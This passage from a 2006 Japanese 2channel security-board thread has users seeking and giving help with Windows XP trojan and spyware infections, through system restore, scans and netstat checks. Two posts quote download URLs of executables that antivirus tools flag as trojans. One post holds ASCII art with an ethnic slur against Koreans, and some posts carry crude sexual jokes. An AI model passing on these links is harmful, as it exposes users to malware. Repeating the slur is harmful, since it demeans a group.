386 :名無しさん@お腹いっぱい。:2006/06/11(日) 19:15:04
ホントにバカですね^^

387 :名無しさん@お腹いっぱい。:2006/06/11(日) 20:18:46
下のURLをクリックしてしまったら、「トロイの木馬を発見しました」と表示されました。
駆除、隔離、消去ができず、キャンセルを押してしまいました。
システムの復元をして、その後ウイルススキャンをしましたが
感染は見つかりませんでしたとなりました。
セキュリティーソフトはマカフィーです。
これはもう、ウイルスの心配は無いでしょうか?
どなた様かウイルスの駆除が必要な場合教えてください。


ここをクリックしたら「トロイの木馬を発見しました」と出ました。
ttp://www.hoyoo.net/test/ROHoyoo.exe
ここをクリックして問題が発生しても私は責任を取れませんので、
自己責任でお願いします。

388 :名無しさん@お腹いっぱい。:2006/06/11(日) 20:34:15
すみませんテンプレ通りに書き直します。

【使用OS】 XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 マカフィーです
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 なし
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】 自覚症状なし
【何をしたらそんなことになったのか】 tp://www.hoyoo.net/test/ROHoyoo.exeをクリックしたら
「トロイの木馬を発見しました」となりました。
【これまでにとった措置】システム復元、ウイルススキャン
【その他の質問】 これはもう、ウイルスの心配は無いでしょうか?
どなた様かウイルスの駆除が必要な場合教えてください。
発見されたときには、ウイルス入りのフォルダ名が表示されていたのですか、
その後そのフォルダが消えていました。
どういうことでしょうか?



389 :名無しさん@お腹いっぱい。:2006/06/11(日) 20:43:48
トロイの木馬発見って警告でてんだから駆除できてるでしょ?
何のためのセキュリティーソフトなのよ

390 :名無しさん@お腹いっぱい。:2006/06/11(日) 20:48:18
駆除、隔離、消去ができなかったんです。
手動で行ってくださいと出ました。
その後、キャンセルし再びウイルススキャンをしたのですが、
見つからず・・・

391 :名無しさん@お腹いっぱい。:2006/06/11(日) 20:50:53
でも実行してないんでしょー
だったら問題ないし。
そもそもダウンロードをマカフィーが止めた気がするんだけどね

392 :名無しさん@お腹いっぱい。:2006/06/11(日) 21:03:29
そうです、クリックしたらウイルス「発見」と表示されました。
ダウンロードを実行する前にマカフィーが止めてくれたんですね?

393 :名無しさん@お腹いっぱい。:2006/06/11(日) 21:07:20
たとえダウンロードして実行しようとしてもマカフィーが止めてくれます
今の環境でそれが動く事はないのー
PC内でROHoyoo.exeを探してなければこの件は終了でイイかと

394 :名無しさん@お腹いっぱい。:2006/06/11(日) 21:10:12
本当にありがとうございます。
丁寧に教えていただき、誠に感謝です。
早速探してみますね。

395 :名無しさん@お腹いっぱい。:2006/06/11(日) 21:21:33
オンラインスキャン、ファイル名指定での検索、共にROHoyoo.exeは見つかりませんでした。
本当にありがとうございました!

396 :名無しさん@お腹いっぱい。:2006/06/11(日) 21:38:28
                                      ._)  る ま
    (_                                  _)  よ っ
 馬 (_             ,.-'"二フ                ._)  こ 先
 鹿 (_. ______         / //´                 _)  い に
 な .(___ヽ、__`ヽ.      | | /              ,.-‐-、 _)  つ 釣
 朝 (_ `\ ヽ、!    ____,/ / !_     ,.-─-、     /    ,!. _)  達 ら
 鮮 (_   `ヽ ヽ、'' ´   i。i./ `ヽ、. /    i ',__,,,,.....i i    | _).  ! ! れ
 人 (_    ,`>!。/   `´       i    /、_,!::::::::::::'-'、___,.ノ、 ._)    て
 ね (_   /     i   ヽ  、   ヽ、__,./   ;::::i::::;:::;:  :;::::::ヽ.)
. ! ! (_   ,'   / _ !,ハ ハ,.ニ!、 iヽ!   !,.イ::::/:::::レ::ハ:!、!__,.ハ::ル:::::',^Y^Y^Y^
    (_   i  .i. ,!-!、::V::´ト ! }ハ !、  レ::::::レ:'r‐'i´ レ',!'-'、。o:::::::::ヽ ×
Y^Y^Y.× イ i ハi ト_!::::::::::::'ー'゙  Vi   ハ::o。!'⌒     " ハ::::ハ::::,.-'、 ×
         レヘ 7,,       ""i | i  ゜i:::::7"  i' ̄`i  /:::!::::::::/ @i
        ×  !人   -‐ '    人/ ハ イ:::人   ヽ ノ  !::::ハ::::/  /、
        / .ヘ`ヽ、_____,,.. //トー-'、! V::ハ::ー-r‐='T´V,.イ  ー、/`ヽ
        レ´ i ヽ、 /i///_」::::::/:::ヽ. !  ` ,.く,.〈〉、_,.イ ヽ、___ノ、/ノ
          ! .!/ヘ,.-'─、、;;;;____:::::::ヽ. |.  r〈 !     ヽ、___二ン
          / /7:Y/ ,   l |:oo::::::`ヽ::i |  7ヽイ__,.'-っ、  〈 ,,..
         //::::i:〈iゝi、_!__r//:::::::::::::::::ン ノ 〈  ̄    ノ 、 `ヽ ゛
        /::::::::/:::::Y:::::::::ゝ'─r--‐-i´イ   `ー7''" ̄´   ヽ

397 :名無しさん@お腹いっぱい。:2006/06/11(日) 23:02:09
パソコンの画面に、精子かけるとウィルス駆除できるってホント?

398 :名無しさん@お腹いっぱい。:2006/06/11(日) 23:39:30
>>397
試しにやってみたら?

399 :名無しさん@お腹いっぱい。:2006/06/11(日) 23:47:28
射精したあとの虚しさでモニター拭きながら死にたくなると思うよ、きっと

400 :名無しさん@お腹いっぱい。:2006/06/12(月) 01:15:06
死にたくなりますた_| ̄|○

401 :名無しさん@お腹いっぱい。:2006/06/12(月) 01:53:54
>>400
やったのかよw
400ゲトおめこww

402 :名無しさん@お腹いっぱい。:2006/06/12(月) 02:28:56
ものすごくあせっています!どなたか教えてください!
パソコンを立ち上げたら画面がしましまになってきて薄くなって
最後にはデスクトップも何も見えず、じわ〜っとした画面になってしまいました。
怖くなって電源を落とし、もう一度電源を入れてみたら灰色一色で
周りが黒くじわじわしています。

Windows XPで、ウイルス対策ソフトは期限切れでした。
数日前outlookexpressでメールの中に感染したソフトを発見した
とか削除しましたというようなメッセージが出ていたのですが、
そのままにしていました。

画面に何も出ないってもう修復不可能なのでしょうか。。。
以上の情報で何かわかりますでしょうか。
全く知識もないもんで誰か助けてください!!!

403 :名無しさん@お腹いっぱい。:2006/06/12(月) 03:03:59
慌てず>>1のテンプラを

404 :名無しさん@お腹いっぱい。:2006/06/12(月) 03:39:40
>>387
バスターで TSPY_LINEAGE.TX と出る。

405 :名無しさん@お腹いっぱい。:2006/06/12(月) 16:43:16
>>402
もうPCが立ち上がらないって事かな?セーフモードは無理?
本当はウイルスとかから開放されるにはリカバリが一番てっとり早いんだけど、立ち上げても何も起動しない様なら素直にPC購入した所で復旧作業行った方が早いかもしれないよ。

406 : ◆N9P3SuvBPo :2006/06/12(月) 17:57:16
>402
セーフモードが駄目であっても、セーフモードとコマンドプロンプトなら、
もしかして起動できるかも知れないから、それで起動できたら、
↓のコマンド入力して「Enter」

%systemroot%\system32\restore\rstrui.exe
(システムの復元で復旧)
だめなら、リカバリです。

407 :名無しさん@お腹いっぱい。:2006/06/12(月) 21:06:37
【使用OS】
 winXP
【WindowsUpdateしてるか】
 最近はしていませんでした
【AntiVirusは何を使っているか】
 avast!
【ちゃんとUpdateしてるか】
 はい
【スキャンした結果(ウイルス名・発見場所)】
トロイの木馬とスパイウェアを発見しました。
・Win32:Spyware-gen.[Trj]
  C\PROGRA~1\NEWDOT~1\NEWDOT~2.DLL
  C\Program Files\NewDotNet\newdotnet7_22.dll
・Win32:Adware-gen.[Adw]
  C\Program Files\NewDotNet\uninstall7_22.dll
・C\WINDOWS\system32\hlwin.dll
【別のオンラインスキャンしたならその結果は】
 削除or何もしない、の二択しか出来ない
【症状を具体的に、分かる限りすべて書く】
 ・ネットが繋がらない
 (LAN使用、回線に繋がったというバルーンは出るが実際は繋がらない)
 ・ファイアウォールが無効
 (セキュリティーセンター、コントロールパネルから試したけれども有効に出来ませんでした)
【何をしたらそんなことになったのか】
 起動した時
【これまでにとった措置】
 感染したファイルを一回削除してしまいました。
 ファイルを復元してみましたが、症状は変わりません。

408 :名無しさん@お腹いっぱい。:2006/06/12(月) 21:17:58
>>407
このへんかなぁ
駆除ツールあるみたいだし物は試し
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=ADW%5FNDOTNET%2EO

それからWindowsUpdateにはいって来い

409 :407:2006/06/12(月) 22:37:07
ありがとうございます。

そのページに書かれたファイルがインストールされていました。
削除手順に従って処理をしてみましたが
いくつかファイルは検出されたものの、「ADW_NDOTNET.O」は見つかりませんでした。
一応隔離処理はしました。

未だにファイアウォール無効、ネットに繋がらなかったりと、
症状は直っておりませんがこれについてはスレ違いとなってしまうでしょうか。

410 :名無しさん@お腹いっぱい。:2006/06/13(火) 00:46:12
>>407
私も今日同じような症状になりました。感染したファイル名も同じでAvast使ってます。
もしかしたらAvastがいけないのでしょうか?

411 :名無しさん@お腹いっぱい。:2006/06/13(火) 10:13:16
【使用OS】 WindowsXP
【WindowsUpdateしてるか】 春ごろやりました
【AntiVirusは何を使っているか】 Norton AntiVirus 2005
【ちゃんとUpdateしてるか】 ウィルス定義 2006/06/07
【スキャンした結果(ウイルス名・発見場所)】
昨日スキャンした所、VBS.Freelink.Bに感染していると出て
 ファイル削除しましたと出ました
 その後3回スキャンしましたが何も反応はありません
【別のオンラインスキャンしたならその結果は】
C:\Documents and Settings\ton\Local Settings\Temporary
Internet Files\Content.IE5\4FD3UUBT\1150005307[1].htm は 
VBS.Freelink.B に感染しています。
【症状を具体的に、分かる限りすべて書く】 特に症状はないです
【何をしたらそんなことになったのか】 どこかのブログか日記で感染したらしいですorz
【これまでにとった措置】 何もしてません、システム復元もやっていません
【その他の質問】 ドキュメント内というのはわかるのですが
 どこをどう探していいのか見当つきません
 削除の仕方ご指南頂けないでしょうか
 よろしくお願いします

412 :名無しさん@お腹いっぱい。:2006/06/13(火) 11:26:30
>>411
\Content.IE5はエクスプローラで表示できると思ったけど…

インターネットのプロパティ→全般→ファイルの削除

413 :名無しさん@お腹いっぱい。:2006/06/13(火) 12:45:27
>>412
削除後、ノートンとオンラインチェックした所
安全!と出ました、ありがとうございます、助かりました

414 :名無しさん@お腹いっぱい。:2006/06/14(水) 02:13:53
海外のエロサイトに行ったら、いきなり新種のブラックワームだとかに感染してるから、
無料スキャンしろだとかやたら出たけど、怪しすぎだよな?

415 :名無しさん@お腹いっぱい。:2006/06/14(水) 03:11:04
>>414
たぶんこれ
WinAntiVirus Pro 2006
つttp://pc8.2ch.net/test/read.cgi/sec/1143972325/

416 :名無しさん@お腹いっぱい。:2006/06/14(水) 03:21:50
>>415
おお、ご苦労様です。
とりあえず既にwindowsに搭載されてるスキャンの方でウィルス検索やってます。
例のサイトには入っただけなのであまり心配してないけど、一応スパイボットもやっときます。


417 :名無しさん@お腹いっぱい。:2006/06/14(水) 03:30:12
http://blog.lucanian.net/archives/data/20060415-03.gif
この画像と全く同じやつだった。怪しすぎるから…


418 :名無しさん@お腹いっぱい。:2006/06/14(水) 03:57:34
>>416
最初にSpybotやるとレジストリにゴミが残るよ
ttp://hjdb.higaitaisaku.com/database.cgi?cmd=dp&num=467

419 :名無しさん@お腹いっぱい。:2006/06/14(水) 04:12:12
>>418
例のやつは怪しいかったのでダウンロードしてなかったし、
ウィルススキャン(標準搭載のを最新にした)→Spybotという順番でやってウィルス、スパイウェアがゼロだったので、
無事に終わったところです。お手数お掛けしました。
あとでレジストリのゴミとかいうのも検索しときます。



420 :名無しさん@お腹いっぱい。:2006/06/14(水) 06:25:58
bootconf.exeってのがあったんだけど、これってまずい?
mcafeeのオンラインスキャンかけたらなにもHitしなかったんだけど

421 :名無しさん@お腹いっぱい。:2006/06/14(水) 06:51:53
      _______                     __
    // ̄~`i ゝ                    `l |
    / /        ,______   ,_____    ________  | |  ____ TM
   | |     ___ // ̄ヽヽ // ̄ヽヽ (( ̄))   | | // ̄_>>
   \ヽ、   |l | |    | | | |    | |  ``( (.  .| | | | ~~
      `、二===-'  ` ===' '  ` ===' '  // ̄ヽヽ |__ゝ ヽ二=''
                         ヽヽ___//   日本
  _____ _____  ______  _______
  |  ウェブ  | | イメージ | | グループ | | ディレクトリ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ._________________
      |bootconf.exe.                │・検索オプション
      └────────────────┘・表示設定
         | Google検索 | I'm Feeling Lucky |  ・言語ツール
          ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ○ウェブ全体から検索 ◎日本語のページを検索


422 :名無しさん@お腹いっぱい。:2006/06/14(水) 07:16:52
>>421
ぐぐって、bootconf.exeの中身見てみたんだが
%SystemRoot%\SYSTEM32\CONFIG.NT
%SystemRoot%\SYSTEM32\AUTOEXEC.NT
って書いてあるんだけど、上2個を使ってMS-DOSのプログラムを走らせるって感じ?
いまいちわからない・・・
とりあえずzipで固めて、0バイトノ同名ファイルおいておいたんだけど・・・

423 :名無しさん@お腹いっぱい。:2006/06/14(水) 15:56:12
age

424 :名無しさん@お腹いっぱい:2006/06/14(水) 16:22:46
\All Users\Application Data\Microsoft\PlugIn に開いた映画やテキストファイルなどが勝手に保存されてるけど、
ウィルスかスパイウェアっぽいよね・・・
ちなみにウィルス対策はノートン先生使ってるし、スパイウェア対策もSpybot1.4やオンラインスキャンとかしたけど、
なにも見つからんかった・・・_| ̄|○

どうなってんだ・・・(´・ω・`)

425 :424:2006/06/14(水) 16:24:15
映画ってか自分って作った動画ね(´・ω・`)

426 :名無しさん@お腹いっぱい。:2006/06/14(水) 20:36:14
【使用OS】 WindowsXP
【WindowsUpdateしてるか】 自動更新
【AntiVirusは何を使っているか】 マカフィーの勝手に更新するやつ
【ちゃんとUpdateしてるか】 一応最新 
【スキャンした結果(ウイルス名・発見場所)】 ネットしてたら右下にウィルス検出しました。ってでた
VBS.LoveLetter にアルファベットがついてたんですけど画面を消してしまって
追い方がわかりませんでした。場所も不明。。
【症状を具体的に、分かる限りすべて書く】 無線RUNが突然切れたり、電波をキャッチ
しない。つなぎ直すと、回線は回復するが、右下のアイコンには×印がついてる
【何をしたらそんなことになったのか】 不明。パソコン立ち上げ時におかしくなった
【これまでにとった措置】 削除不可能と出てたが、ヘルプ等をみてたら削除できるようになってた
【その他の質問】 ファイル削除はしたんですが、相変わらず途中で回線が切断されて
しまいます。ウィルスが残ってるのか、初期化しか回復方法がないのか教えてほしいです。
あと、感染ルートがわかりません。どこかに感染源はメールからとあったのですが
大手企業のお知らせ程度にしか使ってません。


427 :名無しさん@お腹いっぱい。:2006/06/14(水) 20:56:43
>>426
顔洗って出直してくれ。

428 :名無しさん@お腹いっぱい。:2006/06/14(水) 21:34:22
>>424
>\Application Data

429 :名無しさん@お腹いっぱい。:2006/06/14(水) 21:41:11
>>426
恋文はメール感染onlyでブラウザ経由はない
よってそれはマカフィーの誤検出
したがって無線LANの現象と検出された代物に関係はない

430 :424:2006/06/14(水) 23:09:33
>>428
それがどのアプリケーションかがわからないんですよ(;´Д`)

431 :名無しさん@お腹いっぱい。:2006/06/15(木) 00:10:15
ヤフーのメルアドに最近よくウィルス付きのメールがよく届き
気味がわるいです。どうも、ドメインがOCNっぽいところから届くんですが
アドレスが毎回変わります。しかし、添付ファイルはいつも一緒です。
日本からなので知っている奴からの嫌がらせなのかと思ってしまいます。
また、自分が使っているのメルアド、仕事の自分のメルアドからも
送っていないウィルス付きのメールが届くようになりました。
対処法はありますでしょうか?

送られてきたメールの詳細ヘッドです。

X-Apparently-To: ******@******co.jp via 2**.*3.**.7*; Wed, 14 Jun 2006 08:51:59 +0900
X-YahooFilteredBulk: 1**.2**.**0.**7
Authentication-Results: m***1.mail.***.yahoo.co.jp from=p0031.ocn.ne.jp; domainkeys=neutral (no sig)
X-Originating-IP: [1**.2**.**0.**7 ]
Return-Path: <u0031413@p0031.ocn.ne.jp>
Received: from 1**.2**.**0.**7 (EHLO yahoo.co.jp) (1**.2**.**0.**7 ) by m****1.mail.***.****.co.jp with SMTP; Wed, 14 Jun 2006 08:51:59 +0900
From: u0031413@p0031.ocn.ne.jp アドレスブックに追加
To: i*****@*****.co.jp
Subject: Re: Approved
Date: Wed, 14 Jun 2006 08:54:29 +0900
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0005_00007A6D.000074E5"
X-Priority: 3
X-MSMail-Priority: Normal
Content-Length: 17119


432 :名無しさん@お腹いっぱい。:2006/06/15(木) 00:12:39
勝手に何回も再起動させられ途方に暮れてます。セーフモードでシステムの復元をしても同じ現象が起き、大変困ってますorz
恐らくLimewireで感染したウイルスの仕業ぽいんですよね…解決方法など知っている方助けてください;

433 :名無しさん@お腹いっぱい。:2006/06/15(木) 00:15:19
>>432
>>1

434 :名無しさん@お腹いっぱい。:2006/06/15(木) 00:24:44
>>433
スマナス

windowsXP

AVG

updateは行っていなかった。

スキャン出来ずに再起動されます。

435 :名無しさん@お腹いっぱい。:2006/06/15(木) 00:26:43
P2P関連のウィルスは、Download板に専門スレッドがあります。

436 :名無しさん@お腹いっぱい。:2006/06/15(木) 00:48:55
>>434
テンプレ

437 :名無しさん@お腹いっぱい。:2006/06/15(木) 12:02:29
>>434
プロセスにmsblast.exeがあるか確認。

438 :名無しさん@お腹いっぱい。:2006/06/15(木) 13:16:15
>>434
Netに繋ぐな!っつーんだよ。バァーロー

んで、リカバリしてよね  イャン

439 :名無しさん@お腹いっぱい。:2006/06/15(木) 13:21:13
おまい人生大丈夫かぁ?

440 :名無しさん@お腹いっぱい。:2006/06/15(木) 14:32:20
>>438
わかりました

441 :名無しさん@お腹いっぱい。:2006/06/15(木) 16:59:56
>>437

ありませんでした…orz

442 :名無しさん@お腹いっぱい。:2006/06/15(木) 17:42:58
独自で調べてみていろいろとしてみた所マシになりましたが、IEを使うとすぐ再起動されます。
AVGで駆除しようとしても、途中で再起動させられるといった状況です。
あと、MSNメッセンジャーは問題なく起動できました><

443 :名無しさん@お腹いっぱい。:2006/06/15(木) 17:51:06
クリーンインスコ

444 :名無しさん@お腹いっぱい。:2006/06/15(木) 17:56:22
>>442
↓を使ってみてはどう?
トレンドマイクロシステムクリーナー
ttp://www.trendmicro.co.jp/download/tsc.asp

445 :名無しさん@お腹いっぱい。:2006/06/15(木) 17:58:28
>>444
インターネットを使うとすぐ再起動させられてページさえ見れないですorz

446 :444:2006/06/15(木) 18:06:36
>>445
↓が直リンだけど、飛べる?
ttp://www.trendmicro.com/ftp/products/tsc/tsc.zip

447 :名無しさん@お腹いっぱい。:2006/06/15(木) 18:07:03
あと、症状の追加で青い画面がでます。
上二行には A problem has been detected and windows has been shut downto prevent damage to your computer.
とでてます。

448 :名無しさん@お腹いっぱい。:2006/06/15(木) 18:09:47
>>446
ここへの書き込み観覧は携帯から行ってます。
携帯からは見れませんでした。
PCからだと2ちゃんに行く前に再起動になります。
IE自体使えない状況ですね…orz

449 :名無しさん@お腹いっぱい。:2006/06/15(木) 18:44:07
【使用OS】 WIN XP SP2
【WindowsUpdateしてるか】 YES
【AntiVirusは何を使っているか】 AVEST最新
【ちゃんとUpdateしてるか】 YES
【スキャンした結果(ウイルス名・発見場所)】 出来ない状態
【別のオンラインスキャンしたならその結果は】 同上
【症状を具体的に、分かる限りすべて書く】 キーボードの「E」を押すと、スタンバイ状態になるなど。他にも、何らかの操作でシャットダウンになる模様。ログオン時のパスワードに「E」を使うので、ログオンすら出来ない。現在別のPCで書込み中。
【何をしたらそんなことになったのか】 事前に落とした漫画を読んでいた。その後「アトリエかぐや」でぐぐろうとしたら「え」の部分でスタンバイ状態に入る。
【これまでにとった措置】 強制終了や、キーボードの取り外し等を行うが、効果無し。現在シャットダウン中。
【その他の質問】

よろしくお願いします。
何も出来ない状態です。お願いします。助けてください。

450 :444:2006/06/15(木) 18:46:09
>>448
普通にフォルダから446のアドレスを打込んで飛んでもダメ?
(ファイル名を指定して実行で打込んでも可)

451 :名無しさん@お腹いっぱい。:2006/06/15(木) 19:05:17
>>450
飛べました。

452 :名無しさん@お腹いっぱい。:2006/06/15(木) 19:08:26
しかしページに飛んで1分ぐらいで再起動させられます。

453 :名無しさん@お腹いっぱい。:2006/06/15(木) 19:52:32
症状追加。
スタート画面からのすべてのプログラムにカーソルをあわすと再起動

454 :名無しさん@お腹いっぱい。:2006/06/15(木) 20:06:43
>>453
ちゃんとテンプレ使って質問して。
情報を小出しにしてもハッキリわからんよ。

ダメもとで
ttp://support.microsoft.com/default.aspx?scid=kb;ja;885627
アドウェア T.V. Media プログラム削除ツール
やってみたら?

455 :444:2006/06/15(木) 20:12:45
>>453
MSNメッセンジャーでログインできて、通常の機能を使えるのなら、
ちょっと救いがありそうですが、
基本的に貴重なデータのバックアップをし、
OSのインストールし直しを考えた方が賢明と思います。
クリーンな環境からセキュリティを固めてください。
念のため、PCのハード的な環境(熱対策etc)も
あわせて確認しておくのもいいです。


456 :名無しさん@お腹いっぱい。:2006/06/15(木) 20:21:54
>>453
セーフモードやってみた?


457 :名無しさん@お腹いっぱい。:2006/06/15(木) 20:27:24
>>456
セーフモードで試してみましたが同じ症状がでます。

458 :名無しさん@お腹いっぱい。:2006/06/15(木) 21:15:16
>>457ファイル名を指定して実行から 
     sfc/scannow
やってみて、ダメなら再インスコしたほうがいい

459 :名無しさん@お腹いっぱい。:2006/06/15(木) 21:30:24
>>458

sfc/scaanowが見つかりません。
と出ました。

460 :名無しさん@お腹いっぱい。:2006/06/15(木) 21:36:26
>>459
スラッシュの前に半角スペースがいる

461 :名無しさん@お腹いっぱい。:2006/06/15(木) 21:50:44
>>460
黒っぽい画面が一瞬だけでました。
すぐ消えてしまいますね…

462 : ◆N9P3SuvBPo :2006/06/15(木) 21:51:59
>459と>461って>432の人やね?

463 :名無しさん@お腹いっぱい。:2006/06/15(木) 21:55:50
>>462
そうです。

464 : ◆N9P3SuvBPo :2006/06/15(木) 22:00:56
>463
しかし、Limewireで感染って…(ファイル交換ソフトは止めといたほうが良いぜ)
正確にいうと、Limewireで落としたファイル(アイコンが偽装されたEXEファイルを
うっかり)開いて、その直後に>432の症状ってこと?

465 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:06:20
>>464
実際Limewireで感染したかどうかもわからないんですよ…orz
思い当たる物はLlimewireぐらいしかなかったんで…
エロサイトなんて見ませんし…


466 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:07:45
症状が出始めたのはネトゲの最中でした。

467 : ◆N9P3SuvBPo :2006/06/15(木) 22:13:04
>465
症状見るとかなり深刻だね。
もう思い切ってリカバリ(PCを購入時の状態に戻す)をやってみたら?
それか、イチかバチかで【セーフモードとコマンドプロンプト】で起動して、
システムの復元をもう一度試してみるとか?

システムの復元のパス名は、
%systemroot%\system32\restore\rstrui.exe

468 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:20:33
>>463
ネット環境はどんな感じ?

469 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:26:37
C:\Documents and Settings\Owner\Local Settings\Temp\start.exe 2.10KB
何度消しても出てきて作動します
通信しようとするのでZAで止めています
AVGでスキャンしてもウイルスは見つかりませんでした
バスターオンラインスキャンは許可されてませんとか出て使えません 
危険なものなのでしょうか

470 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:29:22
>>467
もう一度復元してみます。
>>468
ネット環境は光です。

471 : ◆N9P3SuvBPo :2006/06/15(木) 22:29:39
>469
432と同じ人?

472 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:30:33
>>471
別人です。

473 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:32:44
>>470
コマンドプロンプトで netstat -a -n 打って
変な接続許してないか確認するのもムダではないかも。
いずれにしろ、リカバリ推奨だね。

474 : ◆N9P3SuvBPo :2006/06/15(木) 22:32:47
>472
別人か、ID無いからわからなくて…

(そっか…この板IDが無いんだ)

475 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:36:54
>>473
リカバリするにはディスクが必要みたいなんですがそれが見当たらないんで無くしたかもしれないですね。
もう諦めるしかないのか…orz

476 : ◆N9P3SuvBPo :2006/06/15(木) 22:38:55
>475
もうちょっと粘ってみては?
てか、「セーフモードとコマンドプロンプト」でのシステムの復元は駄目だったのか?

477 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:39:05
>>473あとコマンドプロンプトについてよければkwskお願いします…

478 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:43:40
>>476
やってみます。

479 :名無しさん@お腹いっぱい。:2006/06/15(木) 22:47:57
してみましたがcmd.exeという画面がでて真っ黒いままです…orz

480 : ◆N9P3SuvBPo :2006/06/15(木) 22:51:41
>479
cmd.exeこそが「コマンドプロンプト」だ。
explorer.exeを起動させない起動方法だからな。
驚くのも無理は無いかも。

画面に↓の表示は出てるか?

c:\>

481 :473:2006/06/15(木) 22:52:39
>>477
ネットを完全に切った状態でも同じ現象ですか?
もしそうだったら、トロイで遠隔操作されている可能性が薄れます。
netstatは怪しい接続を許してないか確かめる手段の一つです。


482 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:02:36
>>480
C:\Documents and Setting\自分の名前がでてます。
>>481
ネット繋いでないと症状はでなかったと思います。
遠隔操作ですか(((゜д゜;)))ガクブル

483 : ◆N9P3SuvBPo :2006/06/15(木) 23:06:56
>482
>C:\Documents and Setting\自分の名前がでてます。
そしたら、
C:\Documents and Setting\ユーザー名\の表示のあとに、

cd /c:\と入力して、enter押して。
そうすれば、c:\>と表示されるから。

484 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:08:36
>>481
netstat -a -nと入れた所
Active Connections
Proto Local Address Fogeign Address State
とでました

485 : ◆N9P3SuvBPo :2006/06/15(木) 23:11:29
(待てよ?)
>482さん、今「セーフモードとコマンドプロンプト」で起動してるんですよね。

486 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:13:53
>>483
cd /c:\と入れた所、ファイル名、ディレクトリ名、またはボリュームラベルの構文が間違っています。とでました。

487 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:14:43
>>485はい。

488 : ◆N9P3SuvBPo :2006/06/15(木) 23:15:16

>486
/は要らなかった.

489 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:16:12
便乗質問ですが、
どのプログラムがどのポートを使っているのわかるソフトとかありますか?

490 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:17:09
>>488
C:\>がでました。

491 : ◆N9P3SuvBPo :2006/06/15(木) 23:18:55
>490
じゃあ、このC:\>の表示のあとに続けて、以下のコマンドを入力して、Enter
%systemroot%\system32\restore\rstrui.exe

492 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:21:50
>>491
システム復元の画面がでました><

493 : ◆N9P3SuvBPo :2006/06/15(木) 23:22:42
>492
あとはもう分かってるよね。
もう一度、症状が出る前の正常な復元ポイントを選んで「復元」

494 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:25:07
>>493
復元中…
丁寧な説明有難う御座います。
これで治ってくれれば幸いです…

495 :473:2006/06/15(木) 23:34:53
>>484
Foreign Addressがその外からの来訪者です。
この列の下にざーと出てくるのです。
192.168.0.*や127.0.0.1以外のローカルでない番号で、
見覚えのない番号があって最後が:80(port80番webサイトをみてると開く)
でないのは注意してみなければなりません。
LISTENは待ち受け状態。
ESTABLISHEDは接続確立です。


496 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:35:08
リカバリーしても駆除できないウイルス
http://pc8.2ch.net/test/read.cgi/sec/1150381139/l50

497 :473:2006/06/15(木) 23:37:34
遅かった…orz。
うまく復活できればいいですね。


498 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:43:17
復元に失敗しましたとでたんで、もう一度してみます。

499 : ◆N9P3SuvBPo :2006/06/15(木) 23:45:03
>498
失敗か、やはりリカバリするべきかな。

500 :469:2006/06/15(木) 23:52:08
Temporary Internet Filesでhttp://dnv-counter.com/trf/start.exe
とうところからで トロイらしいのですが駆除の仕方がわかりません
ググルとホモのち○こが出てきますた orz

501 :名無しさん@お腹いっぱい。:2006/06/15(木) 23:55:18
直リンすると怒られるぞw

502 :469:2006/06/15(木) 23:57:03
すみません m(_ _)m キモイです

503 :名無しさん@お腹いっぱい。:2006/06/16(金) 00:42:10
てか、p2pがらみはdownloa板でやってくれないかな>432
>1にも書いてあるんだけど見えないのか?
>Winny、P2P関連のウィルスは、Download板に専門スレッドがあります。

504 :名無しさん@お腹いっぱい。:2006/06/16(金) 01:08:29
http://www.uploda.org/uporg418616.jpg.html

このsetup.exeがなんだかわかりません。
のぞいた瞬間、消えてしまいました。
アイコンしか情報が残っていません。
情報求む。

505 :469:2006/06/16(金) 01:40:37
Tempファイルとか一時ファイルを全部消したりしてるうちになんとなく出なくなりますた
お騒がせしますた

506 :名無しさん@お腹いっぱい。:2006/06/16(金) 03:40:43
>>500
バスター反応。「TROJ_DLOADER.AXT」

507 :名無しさん@お腹いっぱい。:2006/06/16(金) 10:40:51
>p2pがらみはdownloa板でやってくれないかな
前から思ってたんだけど、
そもそもこの線引きを明確にする意義ってあるの?


508 :名無しさん@お腹いっぱい。:2006/06/16(金) 15:12:42
p2p関連のウイルスじゃないだろ

509 :名無しさん@お腹いっぱい。:2006/06/16(金) 16:21:48
>>508
>>432
>恐らくLimewireで感染したウイルスの仕業ぽいんですよね

510 :名無しさん@お腹いっぱい。:2006/06/16(金) 17:17:37
>>509
>465
>実際Limewireで感染したかどうかもわからないんですよ…orz
どういう経路でなったか不明瞭なときは、別にここでもいいんでねーの?


511 :名無しさん@お腹いっぱい。:2006/06/16(金) 18:36:42
>恐らくLimewireで感染したウイルスの仕業ぽいんですよね
って自分で言ってるじゃん

512 :名無しさん@お腹いっぱい。:2006/06/16(金) 18:38:21
>>507
>そもそもこの線引きを明確にする意義ってあるの?
自分から地雷原に突っ込んでいくヤツの面倒まではみない、って事だった気がする

